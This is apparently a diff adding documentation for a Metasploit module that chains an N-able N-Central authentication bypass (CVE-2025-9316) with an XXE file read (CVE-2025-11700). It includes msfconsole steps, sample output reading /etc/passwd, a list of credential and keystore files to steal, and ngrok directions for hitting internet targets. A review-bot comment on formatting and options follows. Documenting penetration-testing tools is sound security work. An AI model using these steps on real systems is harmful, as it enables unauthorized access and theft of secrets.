|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +This module targets N-able N-Central instances affected by CVE-2025-9316 (Unauthenticated Session Bypass) and CVE-2025-11700 (XXE). |
| 4 | + |
| 5 | +Affected versions: N-Central < 2025.4.0.9 |
| 6 | + |
| 7 | +### Installation |
| 8 | + |
| 9 | +N-able N-Central is a commercial RMM (Remote Monitoring and Management) platform. To obtain a vulnerable version for testing: |
| 10 | + |
| 11 | +1. Contact N-able support or your account representative to request an evaluation copy |
| 12 | +2. Download the installation package from the N-able customer portal |
| 13 | +3. Follow the official installation guide provided by N-able |
| 14 | +4. Ensure the installation is version < 2025.4.0.9 to be vulnerable |
| 15 | + |
| 16 | +Note: This module requires an HTTP server to host the XXE DTD file. |
| 17 | +For WAN testing, you need to expose the DTD server to the internet |
| 18 | +(e.g., using ngrok). |
| 19 | + |
| 20 | +## Verification Steps |
| 21 | + |
| 22 | +1. Start msfconsole |
| 23 | +1. Do: `use auxiliary/scanner/http/nable_ncentral_auth_bypass_xxe` |
| 24 | +1. Do: `set RHOSTS <target_ip>` |
| 25 | +1. Do: `set RPORT 443` |
| 26 | +1. Do: `run` |
| 27 | +1. You should see the module obtain a session ID and read the target file via XXE |
| 28 | + |
| 29 | +## Options |
| 30 | + |
| 31 | +### APPLIANCE_ID |
| 32 | + |
| 33 | +Appliance ID range to test (default: `1-30`). The module will iterate through this range to find a valid appliance ID that allows |
| 34 | +session creation. |
| 35 | + |
| 36 | +### FILE |
| 37 | + |
| 38 | +File to read via XXE (default: `/etc/passwd`). |
| 39 | + |
| 40 | +## Files of Interest |
| 41 | + |
| 42 | +Examples of interesting files that can be read via XXE: |
| 43 | + |
| 44 | +- `/etc/passwd` - User accounts |
| 45 | +- `/opt/nable/var/ncsai/etc/ncbackup.conf` - N-Central backup configuration |
| 46 | +- `/var/opt/n-central/tmp/ncbackup/ncbackup.bin` - PostgreSQL dump file |
| 47 | +- `/opt/nable/etc/keystore.bcfks` - Encrypted keystore file |
| 48 | +- `/opt/nable/etc/masterPassword` - Keystore password |
| 49 | + |
| 50 | +### LOG_PATH |
| 51 | + |
| 52 | +Directory path where the log file is written (default: `/opt/nable/webapps/ROOT/applianceLog`). |
| 53 | +The module writes the XXE payload to a log file in this directory before triggering it. |
| 54 | + |
| 55 | +## Scenarios |
| 56 | + |
| 57 | +### Local Network Testing |
| 58 | + |
| 59 | +When the target N-Central server is on the same network or can reach your machine: |
| 60 | + |
| 61 | +``` |
| 62 | +msf6 > use auxiliary/scanner/http/nable_ncentral_auth_bypass_xxe |
| 63 | +msf6 auxiliary(scanner/http/nable_ncentral_auth_bypass_xxe) > set RHOSTS 192.168.1.100 |
| 64 | +RHOSTS => 192.168.1.100 |
| 65 | +msf6 auxiliary(scanner/http/nable_ncentral_auth_bypass_xxe) > set RPORT 443 |
| 66 | +RPORT => 443 |
| 67 | +msf6 auxiliary(scanner/http/nable_ncentral_auth_bypass_xxe) > set SRVHOST 192.168.1.50 |
| 68 | +SRVHOST => 192.168.1.50 |
| 69 | +msf6 auxiliary(scanner/http/nable_ncentral_auth_bypass_xxe) > set SRVPORT 8080 |
| 70 | +SRVPORT => 8080 |
| 71 | +msf6 auxiliary(scanner/http/nable_ncentral_auth_bypass_xxe) > run |
| 72 | +
|
| 73 | +[*] Using URL: http://192.168.1.50:8080/ |
| 74 | +[*] Started XXE DTD server on 192.168.1.50:8080 |
| 75 | +[*] Scanning 192.168.1.100:443 for N-Central vulnerabilities |
| 76 | +[*] Testing appliance ID: 1 |
| 77 | +[*] Testing appliance ID: 2 |
| 78 | +[*] Testing appliance ID: 3 |
| 79 | +[+] 192.168.1.100:443 - Vulnerable to CVE-2025-9316 (Authentication Bypass) |
| 80 | +[+] 192.168.1.100:443 - Obtained session ID: 1234567890 (appliance ID: 3) |
| 81 | +[*] Testing CVE-2025-11700 (XXE) with session ID: 1234567890 (target file: /etc/passwd) |
| 82 | +[*] DTD requested from 192.168.1.100 |
| 83 | +[+] 192.168.1.100:443 - XXE file read succeeded (CVE-2025-11700) |
| 84 | +[+] File contents: |
| 85 | +
|
| 86 | +root:x:0:0:root:/root:/bin/bash |
| 87 | +bin:x:1:1:bin:/bin:/sbin/nologin |
| 88 | +daemon:x:2:2:daemon:/sbin:/sbin/nologin |
| 89 | +... |
| 90 | +[*] Scanned 1 of 1 hosts (100% complete) |
| 91 | +[*] Server stopped. |
| 92 | +``` |
| 93 | + |
| 94 | +### WAN Testing with ngrok |
| 95 | + |
| 96 | +For testing against targets on the internet, expose your DTD server using ngrok: |
| 97 | + |
| 98 | +1. Start ngrok: `ngrok http 8080` |
| 99 | +2. Configure `SRVHOST` to your ngrok hostname and `SRVPORT` to your ngrok port |
| 100 | + |
| 101 | + |
| 102 | +## Troubleshooting |
| 103 | + |
| 104 | +- **"Unexpected end of file from server"**: The target cannot reach your DTD server. Check firewall rules and ngrok configuration if using |
| 105 | + a tunnel. |
| 106 | +- **"Session already exists"**: Some appliance IDs may be temporarily unavailable. The module will try other IDs automatically. |
| 107 | +- **No session ID obtained**: Try expanding the `APPLIANCE_ID` range or verify the target is vulnerable (N-Central < 2025.4.0.9). |
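Review bot: the `## Files of Interest` heading (line 40 of the file) sits between the `### FILE` and `### LOG_PATH` option subsections, so `LOG_PATH` ends up rendered under "Files of Interest" instead of "Options"; move that list below the `### LOG_PATH` block, or demote it to a sub-item of `### FILE`. The Options section also never documents `SRVHOST`/`SRVPORT` even though the Local Network scenario sets both and the Verification Steps set `RPORT 443` without mentioning `SSL`; add short entries for these so a reader knows the module hosts its own DTD server (as the `[*] Started XXE DTD server on ...` output shows) rather than needing an external one, which is what the "requires an HTTP server" note in Installation currently suggests. Finally, in the ngrok scenario, "Configure `SRVHOST` to your ngrok hostname" will not work as written: `SRVHOST` is the local bind address for the DTD server, and a public hostname cannot be bound locally. The advertised URL is controlled by the `URIHOST`/`URIPORT` advanced options of the HttpServer mixin, so the step should read along the lines of `set SRVHOST 0.0.0.0`, `set SRVPORT 8080`, `set URIHOST <ngrok-host>`, `set URIPORT <ngrok-port>`.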